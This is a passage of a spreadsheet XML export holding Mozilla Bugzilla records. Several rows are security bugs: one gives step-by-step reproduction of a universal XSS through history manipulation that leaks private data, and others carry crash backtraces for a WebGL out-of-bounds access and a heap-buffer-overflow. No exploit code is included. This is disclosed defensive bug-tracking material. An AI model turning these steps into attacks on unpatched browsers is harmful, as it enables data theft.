      <c r="X6031" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6032">
      <c r="A6032" t="n">
        <v>338070</v>
      </c>
      <c r="B6032" t="inlineStr">
        <is>
          <t>2006-05-15 16:12:08 -0700</t>
        </is>
      </c>
      <c r="C6032" t="inlineStr">
        <is>
          <t>Revert the nsISidebar changes made in bug 334471</t>
        </is>
      </c>
      <c r="D6032" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6032" t="n">
        <v>1</v>
      </c>
      <c r="F6032" t="n">
        <v>1</v>
      </c>
      <c r="G6032" t="n">
        <v>3</v>
      </c>
      <c r="H6032" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6032" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6032" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6032" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6032" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6032" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6032" t="inlineStr"/>
      <c r="Q6032" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6032" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6032" t="inlineStr">
        <is>
          <t>mozilla1.8.1beta1</t>
        </is>
      </c>
      <c r="T6032" t="n">
        <v>1</v>
      </c>
      <c r="U6032" t="n">
        <v>0</v>
      </c>
      <c r="V6032" t="n">
        <v>28</v>
      </c>
      <c r="W6032" t="inlineStr">
        <is>
          <t>See bug 334471 comment 22 and following.</t>
        </is>
      </c>
      <c r="X6032" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6033">
      <c r="A6033" t="n">
        <v>737307</v>
      </c>
      <c r="B6033" t="inlineStr">
        <is>
          <t>2012-03-19 18:59:21 -0700</t>
        </is>
      </c>
      <c r="C6033" t="inlineStr">
        <is>
          <t>universal XSS by confusing docshell with short-circuited loads</t>
        </is>
      </c>
      <c r="D6033" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:44 -0700</t>
        </is>
      </c>
      <c r="E6033" t="n">
        <v>1</v>
      </c>
      <c r="F6033" t="n">
        <v>1</v>
      </c>
      <c r="G6033" t="n">
        <v>3</v>
      </c>
      <c r="H6033" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6033" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6033" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K6033" t="inlineStr">
        <is>
          <t>11 Branch</t>
        </is>
      </c>
      <c r="L6033" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6033" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6033" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6033" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6033" t="inlineStr">
        <is>
          <t>[sg:high][qa!]</t>
        </is>
      </c>
      <c r="Q6033" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6033" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6033" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T6033" t="n">
        <v>1</v>
      </c>
      <c r="U6033" t="n">
        <v>0</v>
      </c>
      <c r="V6033" t="n">
        <v>56</v>
      </c>
      <c r="W6033" t="inlineStr">
        <is>
          <t>Created attachment 607410
9.html
User Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Build ID: 20120215223356
Steps to reproduce:
Use javascript to open new window of location on same domain.
On new window, history.pushState change to same or other location on same domain. 
Change location of window to foreign website.
History.back.
History.forward.
History.back.
Actual results:
Foreign website is loaded with my url. 
Also, the javascript on that page then sends requests to my domain. Private information can be obtained from these requests.
Expected results:
Loading of a different domain should cancel the history change.</t>
        </is>
      </c>
      <c r="X6033" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6034">
      <c r="A6034" t="n">
        <v>761831</v>
      </c>
      <c r="B6034" t="inlineStr">
        <is>
          <t>2012-06-05 15:43:38 -0700</t>
        </is>
      </c>
      <c r="C6034" t="inlineStr">
        <is>
          <t>"ASSERTION: obj must be a wrapper" with document.open during DOMNodeRemoved event</t>
        </is>
      </c>
      <c r="D6034" t="inlineStr">
        <is>
          <t>2012-10-21 22:13:57 -0700</t>
        </is>
      </c>
      <c r="E6034" t="n">
        <v>1</v>
      </c>
      <c r="F6034" t="n">
        <v>1</v>
      </c>
      <c r="G6034" t="n">
        <v>3</v>
      </c>
      <c r="H6034" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6034" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6034" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6034" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6034" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6034" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6034" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6034" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6034" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6034" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6034" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6034" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T6034" t="n">
        <v>1</v>
      </c>
      <c r="U6034" t="n">
        <v>0</v>
      </c>
      <c r="V6034" t="n">
        <v>25</v>
      </c>
      <c r="W6034" t="inlineStr">
        <is>
          <t>Created attachment 630346
testcase
###!!! ASSERTION: obj must be a wrapper: 'IS_WRAPPER_CLASS(js::GetObjectClass(obj)) || js::GetObjectClass(obj) == &amp;XPC_WN_Tearoff_JSClass', file js/xpconnect/src/XPCQuickStubs.cpp, line 374</t>
        </is>
      </c>
      <c r="X6034" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6035">
      <c r="A6035" t="n">
        <v>522030</v>
      </c>
      <c r="B6035" t="inlineStr">
        <is>
          <t>2009-10-13 07:30:01 -0700</t>
        </is>
      </c>
      <c r="C6035" t="inlineStr">
        <is>
          <t>Can still crash due to weak refs in the id table</t>
        </is>
      </c>
      <c r="D6035" t="inlineStr">
        <is>
          <t>2009-11-09 18:59:47 -0800</t>
        </is>
      </c>
      <c r="E6035" t="n">
        <v>1</v>
      </c>
      <c r="F6035" t="n">
        <v>1</v>
      </c>
      <c r="G6035" t="n">
        <v>3</v>
      </c>
      <c r="H6035" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6035" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6035" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K6035" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6035" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6035" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6035" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6035" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6035" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q6035" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6035" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6035" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T6035" t="n">
        <v>1</v>
      </c>
      <c r="U6035" t="n">
        <v>0</v>
      </c>
      <c r="V6035" t="n">
        <v>29</v>
      </c>
      <c r="W6035" t="inlineStr">
        <is>
          <t>I hate XUL.  Fix + test coming up, though I still need to try-server this.</t>
        </is>
      </c>
      <c r="X6035" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6036">
      <c r="A6036" t="n">
        <v>1794292</v>
      </c>
      <c r="B6036" t="inlineStr">
        <is>
          <t>2022-10-09 02:41:36 -0700</t>
        </is>
      </c>
      <c r="C6036" t="inlineStr">
        <is>
          <t>Firefox WebGL glvmInterpretFPTransformFour Memory Corruption Vulnerability</t>
        </is>
      </c>
      <c r="D6036" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:29 -0700</t>
        </is>
      </c>
      <c r="E6036" t="n">
        <v>1</v>
      </c>
      <c r="F6036" t="n">
        <v>1</v>
      </c>
      <c r="G6036" t="n">
        <v>3</v>
      </c>
      <c r="H6036" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6036" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6036" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6036" t="inlineStr">
        <is>
          <t>Firefox 105</t>
        </is>
      </c>
      <c r="L6036" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6036" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6036" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6036" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6036" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q6036" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6036" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6036" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T6036" t="n">
        <v>1</v>
      </c>
      <c r="U6036" t="n">
        <v>0</v>
      </c>
      <c r="V6036" t="n">
        <v>84</v>
      </c>
      <c r="W6036" t="inlineStr">
        <is>
          <t>Created attachment 9297729
poc.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Steps to reproduce:
## Title
  - Firefox WebGL glvmInterpretFPTransformFour OOB Access Vulnerability
## Summary
  - A OOB Access vulnerability exists in the WebGL glvmInterpretFPTransformFour
  - The browser process crashes when triggering this bug.
## Test environment
  - Product : Mozilla Firefox 105.0.3
  - OS : macOS Monterey 12.6 (M1 Pro ARM)
## Root Cause Analysis
  ```
  * thread #25, name = 'CanvasRenderer', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x1715efff8)
    frame #0: 0x00000001ade070cc libsystem_pthread.dylib`___chkstk_darwin + 60
libsystem_pthread.dylib`:
-&gt;  0x1ade070cc &lt;+60&gt;: ldur   x11, [x11, #-0x8]
    0x1ade070d0 &lt;+64&gt;: mov    x10, sp
    0x1ade070d4 &lt;+68&gt;: cmp    x9, #0x1, lsl #12         ; =0x1000
    0x1ade070d8 &lt;+72&gt;: b.lo   0x1ade070f0               ; &lt;+96&gt;
Target 0: (firefox) stopped.
(lldb) bt
* thread #25, name = 'CanvasRenderer', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x1715efff8)
  * frame #0: 0x00000001ade070cc libsystem_pthread.dylib`___chkstk_darwin + 60
    frame #1: 0x000000020f692db4 libGLProgrammability.dylib`glvmInterpretFPTransformFour + 424
    frame #2: 0x000000020f913b88 GLRendererFloat`gldLLVMFPTransformFallback + 444
    frame #3: 0x000000020f915cb8 GLRendererFloat`gldLLVMVecPointRender + 6940
    frame #4: 0x000000020f90e5c0 GLRendererFloat`gldRenderPoints + 76
    frame #5: 0x000000020f8e0524 GLEngine`gleLLVMVecPrimPointRender + 1684
    frame #6: 0x000000020f83b88c GLEngine`glDrawArraysInstanced_STD_GL3Exec + 1296
    frame #7: 0x000000020f83acd8 GLEngine`glDrawArrays_UnpackThread + 48
    frame #8: 0x000000020f87689c GLEngine`gleCmdProcessor + 116
    frame #9: 0x00000001adc481b4 libdispatch.dylib`_dispatch_client_callout + 20
    frame #10: 0x00000001adc57414 libdispatch.dylib`_dispatch_lane_barrier_sync_invoke_and_complete + 56
    frame #11: 0x000000020f7e2ac8 GLEngine`glFlush_ExecThread + 32
    frame #12: 0x000000011106ac50 XUL`___lldb_unnamed_symbol52768 + 40
    frame #13: 0x00000001114e90c8 XUL`___lldb_unnamed_symbol63264 + 2252
    frame #14: 0x00000001146fd0a4 XUL`___lldb_unnamed_symbol207810 + 980
    frame #15: 0x0000000113c48764 XUL`___lldb_unnamed_symbol166963 + 312
    frame #16: 0x0000000110e907e8 XUL`___lldb_unnamed_symbol49031 + 756
    frame #17: 0x0000000110e91a24 XUL`___lldb_unnamed_symbol49039 + 168
    frame #18: 0x0000000110c15b4c XUL`___lldb_unnamed_symbol41826 + 4308
    frame #19: 0x0000000110e945d0 XUL`___lldb_unnamed_symbol49067 + 476
    frame #20: 0x0000000110e5ceb8 XUL`___lldb_unnamed_symbol48460 + 80
    frame #21: 0x0000000110c0ea24 XUL`___lldb_unnamed_symbol41796 + 288
    frame #22: 0x0000000100f46fa8 libnss3.dylib`___lldb_unnamed_symbol2250 + 260
    frame #23: 0x00000001ade0c26c libsystem_pthread.dylib`_pthread_start + 148
(lldb) mem read 0x1715efff8
error: memory read failed for 0x1715efe00
  ```
  - If you debug at the point where the crash occurred, you can see that the crash occurred in OpenGLMT.
  - This bug is an Out-Of-Bounds Access vulnerability that occurs in WebGL's handling of the drawElements command.
## Proof-of-Concept
  - Please check the attached file!
## Reproduce
  - open a poc.html in Firefox
  - Wait a few seconds.
## CREDIT Information
  - Dohyun Lee (@l33d0hyun) of SSD Labs
Actual results:
.
Expected results:
.</t>
        </is>
      </c>
      <c r="X6036" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6037">
      <c r="A6037" t="n">
        <v>827070</v>
      </c>
      <c r="B6037" t="inlineStr">
        <is>
          <t>2013-01-05 18:39:05 -0800</t>
        </is>
      </c>
      <c r="C6037" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow WRITE in nsSaveAsCharset::DoCharsetConversion</t>
        </is>
      </c>
      <c r="D6037" t="inlineStr">
        <is>
          <t>2024-05-30 07:59:09 -0700</t>
        </is>
      </c>
      <c r="E6037" t="n">
        <v>1</v>
      </c>
      <c r="F6037" t="n">
        <v>1</v>
      </c>
      <c r="G6037" t="n">
        <v>3</v>
      </c>
      <c r="H6037" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6037" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6037" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K6037" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6037" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6037" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6037" t="inlineStr">
        <is>
          <t>[asan][adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q6037" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6037" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6037" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T6037" t="n">
        <v>1</v>
      </c>
      <c r="U6037" t="n">
        <v>0</v>
      </c>
      <c r="V6037" t="n">
        <v>13</v>
      </c>
      <c r="W6037" t="inlineStr">
        <is>
          <t>Created attachment 698362
Testcase
&gt;==26942== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f83dca1bf36 at pc 0x7f840030e916 bp 0x7fffae650e90 sp 0x7fffae650e88
&gt;WRITE of size 1 at 0x7f83dca1bf36 thread T0
&gt;    #0 0x7f840030e915 in nsSaveAsCharset::DoCharsetConversion(unsigned short const*, char**) src/intl/unicharutil/src/nsSaveAsCharset.cpp:193
&gt;    #1 0x7f840030b29e in nsSaveAsCharset::Convert(unsigned short const*, char**) src/intl/unicharutil/src/nsSaveAsCharset.cpp:103
&gt;    #2 0x7f8403c06bcb in nsEncodingFormSubmission::EncodeVal(nsAString_internal const&amp;, nsCString&amp;, bool) src/content/html/content/src/nsFormSubmission.cpp:734
&gt;    #3 0x7f8403c00320 in nsFSURLEncoded::URLEncode(nsAString_internal const&amp;, nsCString&amp;) src/content/html/content/src/nsFormSubmission.cpp:365
&gt;    #4 0x7f8403bff468 in nsFSURLEncoded::AddNameValuePair(nsAString_internal const&amp;, nsAString_internal const&amp;) src/content/html/content/src/nsFormSubmission.cpp:130
&gt;    #5 0x7f840480efe5 in nsHTMLTextAreaElement::SubmitNamesValues(nsFormSubmission*) src/content/html/content/src/nsHTMLTextAreaElement.cpp:1052
&gt;    #6 0x7f840480f329 in non-virtual thunk to nsHTMLTextAreaElement::SubmitNamesValues(nsFormSubmission*) src/content/html/content/src/nsHTMLTextAreaElement.cpp:1053
&gt;    #7 0x7f8403ee7344 in nsHTMLFormElement::WalkFormElements(nsFormSubmission*) src/content/html/content/src/nsHTMLFormElement.cpp:998
&gt;    #8 0x7f8403ee2fbc in nsHTMLFormElement::BuildSubmission(nsFormSubmission**, nsEvent*) src/content/html/content/src/nsHTMLFormElement.cpp:779
&gt;    #9 0x7f8403ee1c16 in nsHTMLFormElement::DoSubmit(nsEvent*) src/content/html/content/src/nsHTMLFormElement.cpp:713
&gt;    #10 0x7f8403edaf47 in nsHTMLFormElement::DoSubmitOrReset(nsEvent*, int) src/content/html/content/src/nsHTMLFormElement.cpp:664
&gt;    #11 0x7f8403eda6e1 in nsHTMLFormElement::Submit() src/content/html/content/src/nsHTMLFormElement.cpp:396
&gt;    #12 0x7f8403edb1b3 in non-virtual thunk to nsHTMLFormElement::Submit() src/content/html/content/src/nsHTMLFormElement.cpp:398
&gt;    #13 0x7f8408bace47 in nsIDOMHTMLFormElement_Submit(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:4656
&gt;    #14 0x7f8415f7e665 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:373
&gt;    #15 0x7f8415f7e665 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:391
&gt;    #16 0x7f8415f2a081 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2367
&gt;    #17 0x7f8415e89bab in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:348
&gt;    #18 0x7f8415f8be85 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:537
&gt;    #19 0x7f8415f8da25 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:576
&gt;    #20 0x7f84156e531e in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5621
&gt;    #21 0x7f84052ca270 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1525
&gt;    #22 0x7f8402f0b0d3 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, nsString const&amp;) src/content/base/src/nsScriptLoader.cpp:859
&gt;    #23 0x7f8402f085fe in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) src/content/base/src/nsScriptLoader.cpp:757
&gt;    #24 0x7f8402f034d4 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) src/content/base/src/nsScriptLoader.cpp:705
&gt;    #25 0x7f8402ef4226 in nsScriptElement::MaybeProcessScript() src/content/base/src/nsScriptElement.cpp:139
&gt;    #26 0x7f8404b115a8 in nsIScriptElement::AttemptToExecute() src/../../dist/include/nsIScriptElement.h:220
&gt;    #27 0x7f84068777d8 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) src/parser/html/nsHtml5TreeOpExecutor.cpp:791
&gt;    #28 0x7f840687467f in nsHtml5TreeOpExecutor::RunFlushLoop() src/parser/html/nsHtml5TreeOpExecutor.cpp:595
&gt;    #29 0x7f84068b21fd in nsHtml5ExecutorFlusher::Run() src/parser/html/nsHtml5StreamParser.cpp:127
&gt;    #30 0x7f840e44dc3f in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;    #31 0x7f840e0c2495 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:237
&gt;    #32 0x7f840baf8adc in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #33 0x7f840e73f5f2 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
&gt;    #34 0x7f840e73f429 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
&gt;    #35 0x7f840e73f2fe in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
&gt;    #36 0x7f840aeeb317 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #37 0x7f8409a17575 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #38 0x7f83fec61284 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
&gt;    #39 0x7f83fec66e6a in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
&gt;    #40 0x7f83fec69c30 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4088
&gt;    #41 0x41dad6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
&gt;    #42 0x41b2f0 in main src/browser/app/nsBrowserApp.cpp:279
&gt;    #43 0x7f842023976c in
&gt;0x7f83dca1bf36 is located 0 bytes to the right of 694-byte region [0x7f83dca1bc80,0x7f83dca1bf36)
&gt;allocated by thread T0 here:
&gt;    #0 0x40fd17 in __interceptor_realloc
&gt;    #1 0x7f841f48b208 in PR_Realloc src/nsprpub/pr/src/malloc/prmem.c:450
&gt;    #2 0x7f840030cb59 in nsSaveAsCharset::HandleFallBack(unsigned int, char**, int*, int*, int) src/intl/unicharutil/src/nsSaveAsCharset.cpp:147
&gt;    #3 0x7f840030fdd2 in nsSaveAsCharset::DoCharsetConversion(unsigned short const*, char**) src/intl/unicharutil/src/nsSaveAsCharset.cpp:227
&gt;    #4 0x7f840030b29e in nsSaveAsCharset::Convert(unsigned short const*, char**) src/intl/unicharutil/src/nsSaveAsCharset.cpp:103
&gt;    #5 0x7f8403c06bcb in nsEncodingFormSubmission::EncodeVal(nsAString_internal const&amp;, nsCString&amp;, bool) src/content/html/content/src/nsFormSubmission.cpp:734
&gt;    #6 0x7f8403c00320 in nsFSURLEncoded::URLEncode(nsAString_internal const&amp;, nsCString&amp;) src/content/html/content/src/nsFormSubmission.cpp:365
&gt;    #7 0x7f8403bff468 in nsFSURLEncoded::AddNameValuePair(nsAString_internal const&amp;, nsAString_internal const&amp;) src/content/html/content/src/nsFormSubmission.cpp:130
&gt;    #8 0x7f840480efe5 in nsHTMLTextAreaElement::SubmitNamesValues(nsFormSubmission*) src/content/html/content/src/nsHTMLTextAreaElement.cpp:1052
&gt;    #9 0x7f840480f329 in non-virtual thunk to nsHTMLTextAreaElement::SubmitNamesValues(nsFormSubmission*) src/content/html/content/src/nsHTMLTextAreaElement.cpp:1053
&gt;    #10 0x7f8403ee7344 in nsHTMLFormElement::WalkFormElements(nsFormSubmission*) src/content/html/content/src/nsHTMLFormElement.cpp:998
&gt;    #11 0x7f8403ee2fbc in nsHTMLFormElement::BuildSubmission(nsFormSubmission**, nsEvent*) src/content/html/content/src/nsHTMLFormElement.cpp:779
&gt;    #12 0x7f8403ee1c16 in nsHTMLFormElement::DoSubmit(nsEvent*) src/content/html/content/src/nsHTMLFormElement.cpp:713
&gt;    #13 0x7f8403edaf47 in nsHTMLFormElement::DoSubmitOrReset(nsEvent*, int) src/content/html/content/src/nsHTMLFormElement.cpp:664
&gt;    #14 0x7f8403eda6e1 in nsHTMLFormElement::Submit() src/content/html/content/src/nsHTMLFormElement.cpp:396
&gt;    #15 0x7f8403edb1b3 in non-virtual thunk to nsHTMLFormElement::Submit() src/content/html/content/src/nsHTMLFormElement.cpp:398
&gt;    #16 0x7f8408bace47 in nsIDOMHTMLFormElement_Submit(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:4656
&gt;    #17 0x7f8415f7e665 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:373
&gt;    #18 0x7f8415f7e665 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:391
&gt;    #19 0x7f8415f2a081 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2367
&gt;    #20 0x7f8415e89bab in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:348
&gt;    #21 0x7f8415f8be85 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:537
&gt;    #22 0x7f8415f8da25 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:576
&gt;    #23 0x7f84156e531e in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5621
&gt;    #24 0x7f84052ca270 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1525
&gt;    #25 0x7f8402f0b0d3 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, nsString const&amp;) src/content/base/src/nsScriptLoader.cpp:859
&gt;Shadow bytes around the buggy address:
&gt;  0x1ff07b943790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1ff07b9437a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1ff07b9437b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1ff07b9437c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1ff07b9437d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;=&gt;0x1ff07b9437e0: 00 00 00 00 00 00[06]fb fb fb fb fb fb fb fb fb
&gt;  0x1ff07b9437f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1ff07b943800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1ff07b943810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1ff07b943820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1ff07b943830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap righ redzone:     fb
&gt;  Freed Heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
&gt;Stats: 246M malloced (267M for red zones) by 396769 calls
&gt;Stats: 46M realloced by 23752 calls
&gt;Stats: 213M freed by 267399 calls
&gt;Stats: 79M really freed by 187724 calls
&gt;Stats: 464M (464M-0M) mmaped; 116 maps, 0 unmaps
&gt;  mmaps   by size class: 8:294894; 9:32764; 10:8190; 11:12282; 12:2048; 13:1536; 14:1280; 15:384; 16:1152; 17:1312; 18:48; 19:40; 20:24;
